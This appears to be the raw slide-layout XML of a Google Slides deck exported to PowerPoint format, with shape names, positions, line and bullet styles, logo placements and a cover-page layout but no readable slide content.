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12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5" roundtripDataSignature="AMtx7mhjhCfY3kFNIGK5GbTRR3iz1oMtu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30FC0F-5C3E-4966-B63A-2CCE79721B59}">
  <a:tblStyle styleId="{5830FC0F-5C3E-4966-B63A-2CCE79721B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E9358BB0-01F0-4BF1-B8BA-4A1BF30B64E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9"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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId125" Type="http://customschemas.google.com/relationships/presentationmetadata" Target="meta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5" name="Google Shape;18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ae927e1771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8" name="Google Shape;248;gae927e1771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ba014e31c3_0_1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ba014e31c3_0_1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14" name="Google Shape;1014;gba014e31c3_0_1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ba014e31c3_0_2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ba014e31c3_0_2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22" name="Google Shape;1022;gba014e31c3_0_20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ba014e31c3_0_2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ba014e31c3_0_2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30" name="Google Shape;1030;gba014e31c3_0_2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ba014e31c3_0_2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ba014e31c3_0_2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39" name="Google Shape;1039;gba014e31c3_0_2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ba014e31c3_0_2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ba014e31c3_0_2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48" name="Google Shape;1048;gba014e31c3_0_2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ba014e31c3_0_2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ba014e31c3_0_2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57" name="Google Shape;1057;gba014e31c3_0_24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afe6dd4b9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afe6dd4b9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65" name="Google Shape;1065;gafe6dd4b99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ba014e31c3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ba014e31c3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74" name="Google Shape;1074;gba014e31c3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b9e1a338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b9e1a338e6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81" name="Google Shape;1081;gb9e1a338e6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b9e1a338e6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b9e1a338e6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89" name="Google Shape;1089;gb9e1a338e6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6" name="Google Shape;25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b9e1a338e6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b9e1a338e6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97" name="Google Shape;1097;gb9e1a338e6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b9e1a338e6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b9e1a338e6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05" name="Google Shape;1105;gb9e1a338e6_0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b9e1a338e6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b9e1a338e6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13" name="Google Shape;1113;gb9e1a338e6_0_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b9f1380cfe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b9f1380cfe_2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22" name="Google Shape;1122;gb9f1380cfe_2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b9f1380cfe_2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b9f1380cfe_2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0" name="Google Shape;1130;gb9f1380cfe_2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ba014e31c3_1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ba014e31c3_1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8" name="Google Shape;1138;gba014e31c3_1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ba014e31c3_1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ba014e31c3_1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46" name="Google Shape;1146;gba014e31c3_1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ba014e31c3_1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ba014e31c3_1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54" name="Google Shape;1154;gba014e31c3_1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117</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4" name="Google Shape;26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a965f9fa5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a965f9fa50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1" name="Google Shape;271;ga965f9fa50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b250758a83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b250758a83_2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1" name="Google Shape;281;gb250758a83_2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a965f9fa50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a965f9fa50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0" name="Google Shape;290;ga965f9fa50_0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280c43d12_1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b280c43d12_1_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0" name="Google Shape;300;gb280c43d12_1_4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a96dc51dba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a96dc51dba_0_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0" name="Google Shape;310;ga96dc51dba_0_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a96dc51dba_0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a96dc51dba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0" name="Google Shape;320;ga96dc51dba_0_7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96dc51dba_0_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96dc51dba_0_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0" name="Google Shape;330;ga96dc51dba_0_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2" name="Google Shape;1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b9f1380cfe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b9f1380cfe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0" name="Google Shape;340;gb9f1380cfe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b9f1380cfe_1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b9f1380cfe_1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9" name="Google Shape;349;gb9f1380cfe_1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b9f1380cfe_1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b9f1380cfe_1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8" name="Google Shape;358;gb9f1380cfe_1_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b9f1380cfe_1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b9f1380cfe_1_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7" name="Google Shape;367;gb9f1380cfe_1_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b9f1380cfe_1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b9f1380cfe_1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6" name="Google Shape;376;gb9f1380cfe_1_3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b9f1380cfe_1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b9f1380cfe_1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84" name="Google Shape;384;gb9f1380cfe_1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b9f1380cfe_1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b9f1380cfe_1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3" name="Google Shape;393;gb9f1380cfe_1_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b9f1380cfe_1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b9f1380cfe_1_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01" name="Google Shape;401;gb9f1380cfe_1_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b9f1380cfe_1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b9f1380cfe_1_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09" name="Google Shape;409;gb9f1380cfe_1_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b9f1380cfe_1_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b9f1380cfe_1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7" name="Google Shape;417;gb9f1380cfe_1_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8" name="Google Shape;19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b9f1380cfe_1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b9f1380cfe_1_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25" name="Google Shape;425;gb9f1380cfe_1_8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b9f1380cfe_1_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b9f1380cfe_1_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34" name="Google Shape;434;gb9f1380cfe_1_9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b9f1380cfe_1_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b9f1380cfe_1_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2" name="Google Shape;442;gb9f1380cfe_1_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b9f1380cfe_1_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b9f1380cfe_1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0" name="Google Shape;450;gb9f1380cfe_1_10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b9f1380cfe_1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b9f1380cfe_1_1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8" name="Google Shape;458;gb9f1380cfe_1_1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b9f1380cfe_1_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b9f1380cfe_1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66" name="Google Shape;466;gb9f1380cfe_1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b9f1380cfe_1_1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b9f1380cfe_1_1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74" name="Google Shape;474;gb9f1380cfe_1_1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b9f1380cfe_1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b9f1380cfe_1_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83" name="Google Shape;483;gb9f1380cfe_1_13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b9f1380cfe_1_1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b9f1380cfe_1_1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91" name="Google Shape;491;gb9f1380cfe_1_14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b9f1380cfe_1_1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b9f1380cfe_1_1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98" name="Google Shape;498;gb9f1380cfe_1_15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95cb10b87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a95cb10b87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5" name="Google Shape;205;ga95cb10b87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ba014e31c3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ba014e31c3_2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5" name="Google Shape;505;gba014e31c3_2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ba014e31c3_2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ba014e31c3_2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12" name="Google Shape;512;gba014e31c3_2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ba014e31c3_2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ba014e31c3_2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19" name="Google Shape;519;gba014e31c3_2_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ba014e31c3_2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ba014e31c3_2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7" name="Google Shape;527;gba014e31c3_2_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ba014e31c3_2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ba014e31c3_2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35" name="Google Shape;535;gba014e31c3_2_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ba014e31c3_2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ba014e31c3_2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43" name="Google Shape;543;gba014e31c3_2_3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ba014e31c3_2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ba014e31c3_2_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52" name="Google Shape;552;gba014e31c3_2_4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ba014e31c3_2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ba014e31c3_2_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59" name="Google Shape;559;gba014e31c3_2_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ba014e31c3_2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ba014e31c3_2_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67" name="Google Shape;567;gba014e31c3_2_5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ba014e31c3_2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ba014e31c3_2_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75" name="Google Shape;575;gba014e31c3_2_6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1" name="Google Shape;21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ba014e31c3_2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ba014e31c3_2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2" name="Google Shape;582;gba014e31c3_2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ba014e31c3_2_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ba014e31c3_2_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90" name="Google Shape;590;gba014e31c3_2_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ba014e31c3_2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ba014e31c3_2_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97" name="Google Shape;597;gba014e31c3_2_8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ba014e31c3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ba014e31c3_2_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05" name="Google Shape;605;gba014e31c3_2_9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ba014e31c3_2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ba014e31c3_2_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13" name="Google Shape;613;gba014e31c3_2_1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ba014e31c3_2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ba014e31c3_2_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21" name="Google Shape;621;gba014e31c3_2_1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ba014e31c3_2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ba014e31c3_2_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30" name="Google Shape;630;gba014e31c3_2_1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ba014e31c3_2_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ba014e31c3_2_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38" name="Google Shape;638;gba014e31c3_2_1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ba014e31c3_2_1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ba014e31c3_2_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46" name="Google Shape;646;gba014e31c3_2_1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ba014e31c3_2_1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ba014e31c3_2_1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53" name="Google Shape;653;gba014e31c3_2_14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95cb10b87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8" name="Google Shape;218;ga95cb10b87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ba014e31c3_2_1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ba014e31c3_2_1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61" name="Google Shape;661;gba014e31c3_2_1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b9f1380cfe_1_1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b9f1380cfe_1_1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69" name="Google Shape;669;gb9f1380cfe_1_1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b9f1380cfe_1_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b9f1380cfe_1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78" name="Google Shape;678;gb9f1380cfe_1_1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9f1380cfe_1_1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9f1380cfe_1_1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87" name="Google Shape;687;gb9f1380cfe_1_17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b2af087021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b2af087021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4" name="Google Shape;694;gb2af087021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b2af087021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b2af087021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02" name="Google Shape;702;gb2af087021_0_2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b2af087021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b2af087021_0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10" name="Google Shape;710;gb2af087021_0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b2af087021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b2af087021_0_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18" name="Google Shape;718;gb2af087021_0_3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b99faa3ded_2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b99faa3ded_2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26" name="Google Shape;726;gb99faa3ded_2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b99faa3ded_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b99faa3ded_2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33" name="Google Shape;733;gb99faa3ded_2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5" name="Google Shape;22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b99faa3ef2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b99faa3ef2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41" name="Google Shape;741;gb99faa3ef2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a96dc51dba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a96dc51dba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50" name="Google Shape;750;ga96dc51dba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a96dc51dba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a96dc51dba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58" name="Google Shape;758;ga96dc51dba_0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96dc51dba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96dc51dba_0_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67" name="Google Shape;767;ga96dc51dba_0_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a96dc51dba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a96dc51dba_0_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75" name="Google Shape;775;ga96dc51dba_0_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a96dc51dba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a96dc51dba_0_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84" name="Google Shape;784;ga96dc51dba_0_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a96dc51dba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a96dc51dba_0_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93" name="Google Shape;793;ga96dc51dba_0_4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a96dc51dba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a96dc51dba_0_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02" name="Google Shape;802;ga96dc51dba_0_5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ba014e31c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ba014e31c3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11" name="Google Shape;811;gba014e31c3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ba014e31c3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ba014e31c3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19" name="Google Shape;819;gba014e31c3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e927e1771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3" name="Google Shape;233;gae927e1771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ba014e31c3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ba014e31c3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29" name="Google Shape;829;gba014e31c3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ba014e31c3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ba014e31c3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40" name="Google Shape;840;gba014e31c3_0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ba014e31c3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ba014e31c3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52" name="Google Shape;852;gba014e31c3_0_3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ba014e31c3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ba014e31c3_0_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63" name="Google Shape;863;gba014e31c3_0_4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ba014e31c3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ba014e31c3_0_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74" name="Google Shape;874;gba014e31c3_0_5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ba014e31c3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ba014e31c3_0_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83" name="Google Shape;883;gba014e31c3_0_6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ba014e31c3_0_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ba014e31c3_0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93" name="Google Shape;893;gba014e31c3_0_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ba014e31c3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ba014e31c3_0_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03" name="Google Shape;903;gba014e31c3_0_8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ba014e31c3_0_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ba014e31c3_0_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14" name="Google Shape;914;gba014e31c3_0_9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ba014e31c3_0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ba014e31c3_0_1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22" name="Google Shape;922;gba014e31c3_0_10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1" name="Google Shape;24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ba014e31c3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ba014e31c3_0_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30" name="Google Shape;930;gba014e31c3_0_10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ba014e31c3_0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ba014e31c3_0_1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38" name="Google Shape;938;gba014e31c3_0_1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ba014e31c3_0_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ba014e31c3_0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48" name="Google Shape;948;gba014e31c3_0_1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ba014e31c3_0_1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ba014e31c3_0_1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56" name="Google Shape;956;gba014e31c3_0_13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ba014e31c3_0_1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ba014e31c3_0_1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65" name="Google Shape;965;gba014e31c3_0_1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ba014e31c3_0_1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ba014e31c3_0_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73" name="Google Shape;973;gba014e31c3_0_15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ba014e31c3_0_1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ba014e31c3_0_1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81" name="Google Shape;981;gba014e31c3_0_16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ba014e31c3_0_1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ba014e31c3_0_1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89" name="Google Shape;989;gba014e31c3_0_17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ba014e31c3_0_1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ba014e31c3_0_1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97" name="Google Shape;997;gba014e31c3_0_1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ba014e31c3_0_1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ba014e31c3_0_1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06" name="Google Shape;1006;gba014e31c3_0_19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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="665163" y="1497013"/>
            <a:ext cx="7781925" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Google Shape;17;p11" descr="logo.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="72476"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8142288" y="461963"/>
            <a:ext cx="344487" cy="404812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;18;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665610" y="893356"/>
            <a:ext cx="7781518" cy="60459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3200">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 name="Google Shape;19;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665165" y="1651000"/>
            <a:ext cx="7477125" cy="3759200"/>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Font typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-355600" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="20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11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2884488" y="6246813"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313488" y="6246813"/>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4" name="Google Shape;74;p22"/>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5" name="Google Shape;75;p2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6" name="Google Shape;76;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1" name="Google Shape;81;p23"/>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7" name="Google Shape;87;p24"/>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97"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="665163" y="1497013"/>
            <a:ext cx="7781925" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="Google Shape;99;p13" descr="logo.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="72476"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8142288" y="461963"/>
            <a:ext cx="344487" cy="404812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665610" y="893356"/>
            <a:ext cx="7781518" cy="60459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3200">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01" name="Google Shape;101;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665165" y="1651000"/>
            <a:ext cx="7477125" cy="3759200"/>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Font typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-355600" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="20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2" name="Google Shape;102;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2884488" y="6246813"/>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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313488" y="6246813"/>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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2130426"/>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06" name="Google Shape;106;p2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07" name="Google Shape;107;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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;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12" name="Google Shape;112;p2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3" name="Google Shape;113;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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="4406901"/>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18" name="Google Shape;118;p2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19" name="Google Shape;119;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4" name="Google Shape;124;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>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25" name="Google Shape;125;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1600201"/>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26" name="Google Shape;126;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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;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1" name="Google Shape;131;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1535113"/>
            <a:ext cx="4040188" cy="63976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32" name="Google Shape;132;p2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33" name="Google Shape;133;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645027" y="1535113"/>
            <a:ext cx="4041775" cy="63976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34" name="Google Shape;134;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645027"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35" name="Google Shape;135;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
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;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0" name="Google Shape;140;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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;23;p1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4" name="Google Shape;24;p1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5" name="Google Shape;25;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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;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32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457202" y="273049"/>
            <a:ext cx="3008313" cy="116205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9" name="Google Shape;149;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575050" y="273052"/>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50" name="Google Shape;150;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457202" y="1435102"/>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51" name="Google Shape;151;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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792288" y="4800600"/>
            <a:ext cx="5486400" cy="566739"/>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6" name="Google Shape;156;p33"/>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57" name="Google Shape;157;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792288" y="5367338"/>
            <a:ext cx="5486400" cy="8048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58" name="Google Shape;158;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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;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3" name="Google Shape;163;p34"/>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4" name="Google Shape;164;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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4732337"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9" name="Google Shape;169;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="541338" y="190502"/>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0" name="Google Shape;170;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73"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="174" name="Google Shape;174;p36" descr="Untitled-1-01.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6350" y="20638"/>
            <a:ext cx="9144000" cy="6856412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490415" y="2540256"/>
            <a:ext cx="5104098" cy="2018719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="97674"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="4300">
                <a:solidFill>
                  <a:srgbClr val="6DB310"/>
                </a:solidFill>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ver Page">
  <p:cSld name="Cover Page">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 176"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="177" name="Google Shape;177;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25400" y="12700"/>
            <a:ext cx="9169400" cy="6877050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Google Shape;178;p37" descr="logo.png"/>
